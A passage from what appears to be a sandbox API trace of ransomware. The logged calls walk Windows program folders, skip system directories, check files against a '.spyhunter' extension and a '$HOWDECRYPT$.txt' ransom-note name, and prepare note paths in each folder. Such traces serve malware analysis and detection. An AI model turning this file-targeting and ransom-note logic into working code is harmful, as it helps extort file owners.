Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\NextMenuButtonIcon.png") returned 77 [0093.155] StrStrIW (lpFirst="NextMenuButtonIcon.png", lpSrch=".spyhunter") returned 0x0 [0093.155] lstrcmpW (lpString1="NextMenuButtonIcon.png", lpString2="$HOWDECRYPT$.txt") returned 1 [0093.155] lstrcmpW (lpString1="NextMenuButtonIcon.png", lpString2="_uninstalling_.png") returned 1 [0093.155] lstrlenW (lpString="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\NextMenuButtonIcon.png") returned 77 [0093.155] GetProcessHeap () returned 0x2c0000 [0093.155] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xdc) returned 0x377f08 [0093.155] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c310e0, Size=0x1570) returned 0x2c310e0 [0093.155] FindNextFileW (in: hFindFile=0x335fa0, lpFindFileData=0x298eca8 | out: lpFindFileData=0x298eca8) returned 1 [0093.155] lstrcmpiW (lpString1="ParentMenuButtonIcon.png", lpString2="Windows") returned -1 [0093.155] lstrlenW (lpString="Windows") returned 7 [0093.155] lstrcmpiW (lpString1="ParentMenuButtonIcon.png", lpString2="$Recycle.bin") returned 1 [0093.156] lstrlenW (lpString="$Recycle.bin") returned 12 [0093.156] lstrcmpiW (lpString1="ParentMenuButtonIcon.png", lpString2="System Volume Information") returned -1 [0093.156] lstrlenW (lpString="System Volume Information") returned 25 [0093.156] wnsprintfW (in: pszDest=0x2c11050, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\ParentMenuButtonIcon.png") returned 79 [0093.156] StrStrIW (lpFirst="ParentMenuButtonIcon.png", lpSrch=".spyhunter") returned 0x0 [0093.156] lstrcmpW (lpString1="ParentMenuButtonIcon.png", lpString2="$HOWDECRYPT$.txt") returned 1 [0093.156] lstrcmpW (lpString1="ParentMenuButtonIcon.png", lpString2="_uninstalling_.png") returned 1 [0093.156] lstrlenW (lpString="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\ParentMenuButtonIcon.png") returned 79 [0093.156] GetProcessHeap () returned 0x2c0000 [0093.156] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xe0) returned 0x377e20 [0093.156] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c310e0, Size=0x1578) returned 0x2c310e0 [0093.156] FindNextFileW (in: hFindFile=0x335fa0, lpFindFileData=0x298eca8 | out: lpFindFileData=0x298eca8) returned 1 [0093.156] lstrcmpiW (lpString1="PreviousMenuButtonIcon.png", lpString2="Windows") returned -1 [0093.156] lstrlenW (lpString="Windows") returned 7 [0093.156] lstrcmpiW (lpString1="PreviousMenuButtonIcon.png", lpString2="$Recycle.bin") returned 1 [0093.156] lstrlenW (lpString="$Recycle.bin") returned 12 [0093.156] lstrcmpiW (lpString1="PreviousMenuButtonIcon.png", lpString2="System Volume Information") returned -1 [0093.156] lstrlenW (lpString="System Volume Information") returned 25 [0093.156] wnsprintfW (in: pszDest=0x2c11050, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\PreviousMenuButtonIcon.png") returned 81 [0093.157] StrStrIW (lpFirst="PreviousMenuButtonIcon.png", lpSrch=".spyhunter") returned 0x0 [0093.157] lstrcmpW (lpString1="PreviousMenuButtonIcon.png", lpString2="$HOWDECRYPT$.txt") returned 1 [0093.157] lstrcmpW (lpString1="PreviousMenuButtonIcon.png", lpString2="_uninstalling_.png") returned 1 [0093.157] lstrlenW (lpString="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\PreviousMenuButtonIcon.png") returned 81 [0093.157] GetProcessHeap () returned 0x2c0000 [0093.157] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xe4) returned 0x34f238 [0093.157] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c310e0, Size=0x1580) returned 0x2c310e0 [0093.157] FindNextFileW (in: hFindFile=0x335fa0, lpFindFileData=0x298eca8 | out: lpFindFileData=0x298eca8) returned 1 [0093.157] lstrcmpiW (lpString1="SceneButtonInset_Alpha1.png", lpString2="Windows") returned -1 [0093.157] lstrlenW (lpString="Windows") returned 7 [0093.157] lstrcmpiW (lpString1="SceneButtonInset_Alpha1.png", lpString2="$Recycle.bin") returned 1 [0093.157] lstrlenW (lpString="$Recycle.bin") returned 12 [0093.157] lstrcmpiW (lpString1="SceneButtonInset_Alpha1.png", lpString2="System Volume Information") returned -1 [0093.157] lstrlenW (lpString="System Volume Information") returned 25 [0093.157] wnsprintfW (in: pszDest=0x2c11050, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SceneButtonInset_Alpha1.png") returned 82 [0093.157] StrStrIW (lpFirst="SceneButtonInset_Alpha1.png", lpSrch=".spyhunter") returned 0x0 [0093.157] lstrcmpW (lpString1="SceneButtonInset_Alpha1.png", lpString2="$HOWDECRYPT$.txt") returned 1 [0093.158] lstrcmpW (lpString1="SceneButtonInset_Alpha1.png", lpString2="_uninstalling_.png") returned 1 [0093.158] lstrlenW (lpString="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SceneButtonInset_Alpha1.png") returned 82 [0093.158] GetProcessHeap () returned 0x2c0000 [0093.158] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xe6) returned 0x34ee78 [0093.158] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c310e0, Size=0x1588) returned 0x2c310e0 [0093.158] FindNextFileW (in: hFindFile=0x335fa0, lpFindFileData=0x298eca8 | out: lpFindFileData=0x298eca8) returned 1 [0093.158] lstrcmpiW (lpString1="SceneButtonInset_Alpha2.png", lpString2="Windows") returned -1 [0093.158] lstrlenW (lpString="Windows") returned 7 [0093.158] lstrcmpiW (lpString1="SceneButtonInset_Alpha2.png", lpString2="$Recycle.bin") returned 1 [0093.158] lstrlenW (lpString="$Recycle.bin") returned 12 [0093.158] lstrcmpiW (lpString1="SceneButtonInset_Alpha2.png", lpString2="System Volume Information") returned -1 [0093.158] lstrlenW (lpString="System Volume Information") returned 25 [0093.158] wnsprintfW (in: pszDest=0x2c11050, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SceneButtonInset_Alpha2.png") returned 82 [0093.158] StrStrIW (lpFirst="SceneButtonInset_Alpha2.png", lpSrch=".spyhunter") returned 0x0 [0093.159] lstrcmpW (lpString1="SceneButtonInset_Alpha2.png", lpString2="$HOWDECRYPT$.txt") returned 1 [0093.159] lstrcmpW (lpString1="SceneButtonInset_Alpha2.png", lpString2="_uninstalling_.png") returned 1 [0093.159] lstrlenW (lpString="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SceneButtonInset_Alpha2.png") returned 82 [0093.159] GetProcessHeap () returned 0x2c0000 [0093.159] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xe6) returned 0x34f148 [0093.159] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c310e0, Size=0x1590) returned 0x2c310e0 [0093.159] FindNextFileW (in: hFindFile=0x335fa0, lpFindFileData=0x298eca8 | out: lpFindFileData=0x298eca8) returned 1 [0093.159] lstrcmpiW (lpString1="SceneButtonSubpicture.png", lpString2="Windows") returned -1 [0093.159] lstrlenW (lpString="Windows") returned 7 [0093.159] lstrcmpiW (lpString1="SceneButtonSubpicture.png", lpString2="$Recycle.bin") returned 1 [0093.159] lstrlenW (lpString="$Recycle.bin") returned 12 [0093.159] lstrcmpiW (lpString1="SceneButtonSubpicture.png", lpString2="System Volume Information") returned -1 [0093.159] lstrlenW (lpString="System Volume Information") returned 25 [0093.159] wnsprintfW (in: pszDest=0x2c11050, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SceneButtonSubpicture.png") returned 80 [0093.159] StrStrIW (lpFirst="SceneButtonSubpicture.png", lpSrch=".spyhunter") returned 0x0 [0093.159] lstrcmpW (lpString1="SceneButtonSubpicture.png", lpString2="$HOWDECRYPT$.txt") returned 1 [0093.159] lstrcmpW (lpString1="SceneButtonSubpicture.png", lpString2="_uninstalling_.png") returned 1 [0093.159] lstrlenW (lpString="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SceneButtonSubpicture.png") returned 80 [0093.160] GetProcessHeap () returned 0x2c0000 [0093.160] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xe2) returned 0x34f058 [0093.160] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c310e0, Size=0x1598) returned 0x2c310e0 [0093.160] FindNextFileW (in: hFindFile=0x335fa0, lpFindFileData=0x298eca8 | out: lpFindFileData=0x298eca8) returned 1 [0093.160] lstrcmpiW (lpString1="SportsMainBackground.wmv", lpString2="Windows") returned -1 [0093.160] lstrlenW (lpString="Windows") returned 7 [0093.160] lstrcmpiW (lpString1="SportsMainBackground.wmv", lpString2="$Recycle.bin") returned 1 [0093.160] lstrlenW (lpString="$Recycle.bin") returned 12 [0093.160] lstrcmpiW (lpString1="SportsMainBackground.wmv", lpString2="System Volume Information") returned -1 [0093.160] lstrlenW (lpString="System Volume Information") returned 25 [0093.160] wnsprintfW (in: pszDest=0x2c11050, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsMainBackground.wmv") returned 79 [0093.160] StrStrIW (lpFirst="SportsMainBackground.wmv", lpSrch=".spyhunter") returned 0x0 [0093.160] lstrcmpW (lpString1="SportsMainBackground.wmv", lpString2="$HOWDECRYPT$.txt") returned 1 [0093.160] lstrcmpW (lpString1="SportsMainBackground.wmv", lpString2="_uninstalling_.png") returned 1 [0093.160] lstrlenW (lpString="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsMainBackground.wmv") returned 79 [0093.160] GetProcessHeap () returned 0x2c0000 [0093.160] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xe0) returned 0x377d38 [0093.160] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c310e0, Size=0x15a0) returned 0x2c310e0 [0093.160] FindNextFileW (in: hFindFile=0x335fa0, lpFindFileData=0x298eca8 | out: lpFindFileData=0x298eca8) returned 1 [0093.161] lstrcmpiW (lpString1="SportsMainBackground_PAL.wmv", lpString2="Windows") returned -1 [0093.161] lstrlenW (lpString="Windows") returned 7 [0093.161] lstrcmpiW (lpString1="SportsMainBackground_PAL.wmv", lpString2="$Recycle.bin") returned 1 [0093.161] lstrlenW (lpString="$Recycle.bin") returned 12 [0093.161] lstrcmpiW (lpString1="SportsMainBackground_PAL.wmv", lpString2="System Volume Information") returned -1 [0093.161] lstrlenW (lpString="System Volume Information") returned 25 [0093.161] wnsprintfW (in: pszDest=0x2c11050, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsMainBackground_PAL.wmv") returned 83 [0093.161] StrStrIW (lpFirst="SportsMainBackground_PAL.wmv", lpSrch=".spyhunter") returned 0x0 [0093.161] lstrcmpW (lpString1="SportsMainBackground_PAL.wmv", lpString2="$HOWDECRYPT$.txt") returned 1 [0093.161] lstrcmpW (lpString1="SportsMainBackground_PAL.wmv", lpString2="_uninstalling_.png") returned 1 [0093.161] lstrlenW (lpString="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsMainBackground_PAL.wmv") returned 83 [0093.161] GetProcessHeap () returned 0x2c0000 [0093.161] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xe8) returned 0x34e8d8 [0093.161] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c310e0, Size=0x15a8) returned 0x2c310e0 [0093.161] FindNextFileW (in: hFindFile=0x335fa0, lpFindFileData=0x298eca8 | out: lpFindFileData=0x298eca8) returned 1 [0093.161] lstrcmpiW (lpString1="SportsMainToNotesBackground.wmv", lpString2="Windows") returned -1 [0093.161] lstrlenW (lpString="Windows") returned 7 [0093.161] lstrcmpiW (lpString1="SportsMainToNotesBackground.wmv", lpString2="$Recycle.bin") returned 1 [0093.161] lstrlenW (lpString="$Recycle.bin") returned 12 [0093.161] lstrcmpiW (lpString1="SportsMainToNotesBackground.wmv", lpString2="System Volume Information") returned -1 [0093.161] lstrlenW (lpString="System Volume Information") returned 25 [0093.161] wnsprintfW (in: pszDest=0x2c11050, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsMainToNotesBackground.wmv") returned 86 [0093.162] StrStrIW (lpFirst="SportsMainToNotesBackground.wmv", lpSrch=".spyhunter") returned 0x0 [0093.162] lstrcmpW (lpString1="SportsMainToNotesBackground.wmv", lpString2="$HOWDECRYPT$.txt") returned 1 [0093.162] lstrcmpW (lpString1="SportsMainToNotesBackground.wmv", lpString2="_uninstalling_.png") returned 1 [0093.162] lstrlenW (lpString="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsMainToNotesBackground.wmv") returned 86 [0093.162] GetProcessHeap () returned 0x2c0000 [0093.162] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xee) returned 0x355790 [0093.162] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c310e0, Size=0x15b0) returned 0x2c310e0 [0093.162] FindNextFileW (in: hFindFile=0x335fa0, lpFindFileData=0x298eca8 | out: lpFindFileData=0x298eca8) returned 1 [0093.162] lstrcmpiW (lpString1="SportsMainToNotesBackground_PAL.wmv", lpString2="Windows") returned -1 [0093.162] lstrlenW (lpString="Windows") returned 7 [0093.162] lstrcmpiW (lpString1="SportsMainToNotesBackground_PAL.wmv", lpString2="$Recycle.bin") returned 1 [0093.162] lstrlenW (lpString="$Recycle.bin") returned 12 [0093.162] lstrcmpiW (lpString1="SportsMainToNotesBackground_PAL.wmv", lpString2="System Volume Information") returned -1 [0093.162] lstrlenW (lpString="System Volume Information") returned 25 [0093.162] wnsprintfW (in: pszDest=0x2c11050, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsMainToNotesBackground_PAL.wmv") returned 90 [0093.162] StrStrIW (lpFirst="SportsMainToNotesBackground_PAL.wmv", lpSrch=".spyhunter") returned 0x0 [0093.162] lstrcmpW (lpString1="SportsMainToNotesBackground_PAL.wmv", lpString2="$HOWDECRYPT$.txt") returned 1 [0093.162] lstrcmpW (lpString1="SportsMainToNotesBackground_PAL.wmv", lpString2="_uninstalling_.png") returned 1 [0093.162] lstrlenW (lpString="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsMainToNotesBackground_PAL.wmv") returned 90 [0093.162] GetProcessHeap () returned 0x2c0000 [0093.162] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xf6) returned 0x35a460 [0093.162] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c310e0, Size=0x15b8) returned 0x2c310e0 [0093.163] FindNextFileW (in: hFindFile=0x335fa0, lpFindFileData=0x298eca8 | out: lpFindFileData=0x298eca8) returned 1 [0093.163] lstrcmpiW (lpString1="SportsMainToScenesBackground.wmv", lpString2="Windows") returned -1 [0093.163] lstrlenW (lpString="Windows") returned 7 [0093.163] lstrcmpiW (lpString1="SportsMainToScenesBackground.wmv", lpString2="$Recycle.bin") returned 1 [0093.163] lstrlenW (lpString="$Recycle.bin") returned 12 [0093.163] lstrcmpiW (lpString1="SportsMainToScenesBackground.wmv", lpString2="System Volume Information") returned -1 [0093.163] lstrlenW (lpString="System Volume Information") returned 25 [0093.163] wnsprintfW (in: pszDest=0x2c11050, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsMainToScenesBackground.wmv") returned 87 [0093.163] StrStrIW (lpFirst="SportsMainToScenesBackground.wmv", lpSrch=".spyhunter") returned 0x0 [0093.163] lstrcmpW (lpString1="SportsMainToScenesBackground.wmv", lpString2="$HOWDECRYPT$.txt") returned 1 [0093.163] lstrcmpW (lpString1="SportsMainToScenesBackground.wmv", lpString2="_uninstalling_.png") returned 1 [0093.163] lstrlenW (lpString="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsMainToScenesBackground.wmv") returned 87 [0093.163] GetProcessHeap () returned 0x2c0000 [0093.163] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xf0) returned 0x355698 [0093.163] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c310e0, Size=0x15c0) returned 0x2c310e0 [0093.163] FindNextFileW (in: hFindFile=0x335fa0, lpFindFileData=0x298eca8 | out: lpFindFileData=0x298eca8) returned 1 [0093.163] lstrcmpiW (lpString1="SportsMainToScenesBackground_PAL.wmv", lpString2="Windows") returned -1 [0093.163] lstrlenW (lpString="Windows") returned 7 [0093.163] lstrcmpiW (lpString1="SportsMainToScenesBackground_PAL.wmv", lpString2="$Recycle.bin") returned 1 [0093.163] lstrlenW (lpString="$Recycle.bin") returned 12 [0093.163] lstrcmpiW (lpString1="SportsMainToScenesBackground_PAL.wmv", lpString2="System Volume Information") returned -1 [0093.163] lstrlenW (lpString="System Volume Information") returned 25 [0093.163] wnsprintfW (in: pszDest=0x2c11050, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsMainToScenesBackground_PAL.wmv") returned 91 [0093.164] StrStrIW (lpFirst="SportsMainToScenesBackground_PAL.wmv", lpSrch=".spyhunter") returned 0x0 [0093.165] lstrcmpW (lpString1="SportsMainToScenesBackground_PAL.wmv", lpString2="$HOWDECRYPT$.txt") returned 1 [0093.165] lstrcmpW (lpString1="SportsMainToScenesBackground_PAL.wmv", lpString2="_uninstalling_.png") returned 1 [0093.165] lstrlenW (lpString="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsMainToScenesBackground_PAL.wmv") returned 91 [0093.165] GetProcessHeap () returned 0x2c0000 [0093.165] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xf8) returned 0x35a560 [0093.165] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c310e0, Size=0x15c8) returned 0x2c310e0 [0093.165] FindNextFileW (in: hFindFile=0x335fa0, lpFindFileData=0x298eca8 | out: lpFindFileData=0x298eca8) returned 1 [0093.165] lstrcmpiW (lpString1="SportsNotesBackground.wmv", lpString2="Windows") returned -1 [0093.165] lstrlenW (lpString="Windows") returned 7 [0093.165] lstrcmpiW (lpString1="SportsNotesBackground.wmv", lpString2="$Recycle.bin") returned 1 [0093.165] lstrlenW (lpString="$Recycle.bin") returned 12 [0093.165] lstrcmpiW (lpString1="SportsNotesBackground.wmv", lpString2="System Volume Information") returned -1 [0093.165] lstrlenW (lpString="System Volume Information") returned 25 [0093.165] wnsprintfW (in: pszDest=0x2c11050, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsNotesBackground.wmv") returned 80 [0093.165] StrStrIW (lpFirst="SportsNotesBackground.wmv", lpSrch=".spyhunter") returned 0x0 [0093.165] lstrcmpW (lpString1="SportsNotesBackground.wmv", lpString2="$HOWDECRYPT$.txt") returned 1 [0093.165] lstrcmpW (lpString1="SportsNotesBackground.wmv", lpString2="_uninstalling_.png") returned 1 [0093.165] lstrlenW (lpString="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsNotesBackground.wmv") returned 80 [0093.165] GetProcessHeap () returned 0x2c0000 [0093.165] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xe2) returned 0x34f508 [0093.166] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c310e0, Size=0x15d0) returned 0x2c310e0 [0093.166] FindNextFileW (in: hFindFile=0x335fa0, lpFindFileData=0x298eca8 | out: lpFindFileData=0x298eca8) returned 1 [0093.166] lstrcmpiW (lpString1="SportsNotesBackground_PAL.wmv", lpString2="Windows") returned -1 [0093.166] lstrlenW (lpString="Windows") returned 7 [0093.166] lstrcmpiW (lpString1="SportsNotesBackground_PAL.wmv", lpString2="$Recycle.bin") returned 1 [0093.166] lstrlenW (lpString="$Recycle.bin") returned 12 [0093.166] lstrcmpiW (lpString1="SportsNotesBackground_PAL.wmv", lpString2="System Volume Information") returned -1 [0093.166] lstrlenW (lpString="System Volume Information") returned 25 [0093.166] wnsprintfW (in: pszDest=0x2c11050, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsNotesBackground_PAL.wmv") returned 84 [0093.166] StrStrIW (lpFirst="SportsNotesBackground_PAL.wmv", lpSrch=".spyhunter") returned 0x0 [0093.166] lstrcmpW (lpString1="SportsNotesBackground_PAL.wmv", lpString2="$HOWDECRYPT$.txt") returned 1 [0093.166] lstrcmpW (lpString1="SportsNotesBackground_PAL.wmv", lpString2="_uninstalling_.png") returned 1 [0093.166] lstrlenW (lpString="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsNotesBackground_PAL.wmv") returned 84 [0093.166] GetProcessHeap () returned 0x2c0000 [0093.166] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xea) returned 0x3554a8 [0093.166] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c310e0, Size=0x15d8) returned 0x2c310e0 [0093.166] FindNextFileW (in: hFindFile=0x335fa0, lpFindFileData=0x298eca8 | out: lpFindFileData=0x298eca8) returned 1 [0093.166] lstrcmpiW (lpString1="SportsScenesBackground.wmv", lpString2="Windows") returned -1 [0093.166] lstrlenW (lpString="Windows") returned 7 [0093.166] lstrcmpiW (lpString1="SportsScenesBackground.wmv", lpString2="$Recycle.bin") returned 1 [0093.166] lstrlenW (lpString="$Recycle.bin") returned 12 [0093.166] lstrcmpiW (lpString1="SportsScenesBackground.wmv", lpString2="System Volume Information") returned -1 [0093.167] lstrlenW (lpString="System Volume Information") returned 25 [0093.167] wnsprintfW (in: pszDest=0x2c11050, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsScenesBackground.wmv") returned 81 [0093.167] StrStrIW (lpFirst="SportsScenesBackground.wmv", lpSrch=".spyhunter") returned 0x0 [0093.167] lstrcmpW (lpString1="SportsScenesBackground.wmv", lpString2="$HOWDECRYPT$.txt") returned 1 [0093.167] lstrcmpW (lpString1="SportsScenesBackground.wmv", lpString2="_uninstalling_.png") returned 1 [0093.167] lstrlenW (lpString="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsScenesBackground.wmv") returned 81 [0093.167] GetProcessHeap () returned 0x2c0000 [0093.167] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xe4) returned 0x34eba8 [0093.167] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c310e0, Size=0x15e0) returned 0x2c310e0 [0093.167] FindNextFileW (in: hFindFile=0x335fa0, lpFindFileData=0x298eca8 | out: lpFindFileData=0x298eca8) returned 1 [0093.167] lstrcmpiW (lpString1="SportsScenesBackground_PAL.wmv", lpString2="Windows") returned -1 [0093.167] lstrlenW (lpString="Windows") returned 7 [0093.167] lstrcmpiW (lpString1="SportsScenesBackground_PAL.wmv", lpString2="$Recycle.bin") returned 1 [0093.167] lstrlenW (lpString="$Recycle.bin") returned 12 [0093.167] lstrcmpiW (lpString1="SportsScenesBackground_PAL.wmv", lpString2="System Volume Information") returned -1 [0093.167] lstrlenW (lpString="System Volume Information") returned 25 [0093.167] wnsprintfW (in: pszDest=0x2c11050, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsScenesBackground_PAL.wmv") returned 85 [0093.167] StrStrIW (lpFirst="SportsScenesBackground_PAL.wmv", lpSrch=".spyhunter") returned 0x0 [0093.167] lstrcmpW (lpString1="SportsScenesBackground_PAL.wmv", lpString2="$HOWDECRYPT$.txt") returned 1 [0093.167] lstrcmpW (lpString1="SportsScenesBackground_PAL.wmv", lpString2="_uninstalling_.png") returned 1 [0093.167] lstrlenW (lpString="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsScenesBackground_PAL.wmv") returned 85 [0093.167] GetProcessHeap () returned 0x2c0000 [0093.167] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xec) returned 0x355888 [0093.167] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c310e0, Size=0x15e8) returned 0x2c310e0 [0093.168] FindNextFileW (in: hFindFile=0x335fa0, lpFindFileData=0x298eca8 | out: lpFindFileData=0x298eca8) returned 1 [0093.168] lstrcmpiW (lpString1="sports_disc_mask.png", lpString2="Windows") returned -1 [0093.168] lstrlenW (lpString="Windows") returned 7 [0093.168] lstrcmpiW (lpString1="sports_disc_mask.png", lpString2="$Recycle.bin") returned 1 [0093.168] lstrlenW (lpString="$Recycle.bin") returned 12 [0093.168] lstrcmpiW (lpString1="sports_disc_mask.png", lpString2="System Volume Information") returned -1 [0093.168] lstrlenW (lpString="System Volume Information") returned 25 [0093.168] wnsprintfW (in: pszDest=0x2c11050, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\sports_disc_mask.png") returned 75 [0093.168] StrStrIW (lpFirst="sports_disc_mask.png", lpSrch=".spyhunter") returned 0x0 [0093.168] lstrcmpW (lpString1="sports_disc_mask.png", lpString2="$HOWDECRYPT$.txt") returned 1 [0093.168] lstrcmpW (lpString1="sports_disc_mask.png", lpString2="_uninstalling_.png") returned 1 [0093.168] lstrlenW (lpString="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\sports_disc_mask.png") returned 75 [0093.168] GetProcessHeap () returned 0x2c0000 [0093.168] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xd8) returned 0x346d48 [0093.168] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c310e0, Size=0x15f0) returned 0x2c310e0 [0093.168] FindNextFileW (in: hFindFile=0x335fa0, lpFindFileData=0x298eca8 | out: lpFindFileData=0x298eca8) returned 0 [0093.168] FindClose (in: hFindFile=0x335fa0 | out: hFindFile=0x335fa0) returned 1 [0093.169] wnsprintfW (in: pszDest=0x2c11050, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\$HOWDECRYPT$.txt") returned 71 [0093.169] lstrlenW (lpString="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\$HOWDECRYPT$.txt") returned 71 [0093.169] GetProcessHeap () returned 0x2c0000 [0093.169] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xd0) returned 0x37e200 [0093.169] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c310e0, Size=0x15f8) returned 0x2c310e0 [0093.169] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0093.169] lstrcmpiW (lpString1="Stacking", lpString2="Windows") returned -1 [0093.169] lstrlenW (lpString="Windows") returned 7 [0093.169] lstrcmpiW (lpString1="Stacking", lpString2="$Recycle.bin") returned 1 [0093.169] lstrlenW (lpString="$Recycle.bin") returned 12 [0093.169] lstrcmpiW (lpString1="Stacking", lpString2="System Volume Information") returned -1 [0093.170] lstrlenW (lpString="System Volume Information") returned 25 [0093.170] wnsprintfW (in: pszDest=0x30efc0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Stacking") returned 56 [0093.170] lstrcmpW (lpString1="Stacking", lpString2=".") returned 1 [0093.170] lstrcmpW (lpString1="Stacking", lpString2="..") returned 1 [0093.170] GetProcessHeap () returned 0x2c0000 [0093.170] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2c11050 [0093.170] wnsprintfW (in: pszDest=0x2c11050, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Stacking\\*") returned 58 [0093.170] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Stacking\\*", 